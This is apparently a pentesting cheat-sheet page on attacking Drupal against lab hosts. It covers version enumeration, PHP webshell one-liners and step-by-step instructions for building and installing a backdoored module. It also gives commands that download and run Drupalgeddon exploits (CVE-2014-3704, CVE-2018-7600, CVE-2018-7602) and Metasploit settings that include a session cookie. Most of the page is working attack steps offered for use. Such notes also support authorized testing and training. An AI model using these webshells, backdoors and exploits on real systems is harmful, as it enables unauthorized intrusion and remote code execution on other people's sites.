Drupal

Enumeration

Getting Version Number

$ curl -s http://drupal-acc.inlanefreight.local/CHANGELOG.txt | grep -m2 ""

Automating Using Droopescan

$ droopescan scan drupal -u http://drupal.inlanefreight.local

Exploitation

Code Execution

  • Before Drupal 8

    • Login as admin

    • enable PHP filter module -> Save

    • Content -> Add content -> Basic Page (Set Text Format to PHP Code)

    <?php system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']); ?>

  • Drupal 8 onwards

    • Login as admin

    • $ wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

    • Administrattion -> Reports -> Available Updates

    • Upload the downloaded php filter module

    • You can now do the process of uploading a shell just like in version < 8.0

Uploading a Backdoored Module

  1. Download and extract a module

$ wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
$ tar xvf captcha-8.x-1.2.tar.gz

  1. Create a php webshell

<?php
system($_GET[fe8edbabc5c5c9b7b764504cd22b17af]);
?>

  1. Edit .htaccess

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

  1. Move the files to the extracted folder and tar (zip) it

$ mv shell.php .htaccess captcha
$ tar cvf captcha.tar.gz captcha/

  1. Install the backdoored module (Manage -> Extend -> Install new module)

  2. Browse /modules/captcha/shell.php to execute commands.

Drupalgeddon

  • CVE-2014-3704 (7.0 <= 7.31) - Pre-authenticated SQL injection flaw that could be used to upload a malicious form or create a new admin user.

    • $ wget https://www.exploit-db.com/raw/34992
$ python2.7 34992 -t http://drupal-qa.inlanefreight.local -u hacker -p pwnd
    • $ msfconsole
msf6 > use exploit/multi/http/drupal_drupageddon

  • CVE-2018-7600 (7.58 <=8.5.1) - Remote code execution vulnerability

    • $ wget https://www.exploit-db.com/raw/44448
$ python3 drupalgeddon2.py 

Enter target url (example: https://domain.ltd/): http://drupal-dev.inlanefreight.local/

Check: http://drupal-dev.inlanefreight.local/hello.txt

  • CVE-2018-7602 (7.x, 8.x) - Authenticated Remote code execution vulnerability

    • msf6 > use exploit/multi/http/drupal_drupageddon
msf6 exploit(multi/http/drupal_drupageddon3) > set rhosts 10.129.42.195
msf6 exploit(multi/http/drupal_drupageddon3) > set VHOST drupal-acc.inlanefreight.local   
msf6 exploit(multi/http/drupal_drupageddon3) > set drupal_session SESS45ecfcb93a827c3e578eae161f280548=jaAPbanr2KhLkLJwo69t0UOkn2505tXCaEdu33ULV2Y
msf6 exploit(multi/http/drupal_drupageddon3) > set DRUPAL_NODE 1
msf6 exploit(multi/http/drupal_drupageddon3) > set LHOST 10.10.14.15

PreviousJoomlaNextTomcat

Last updated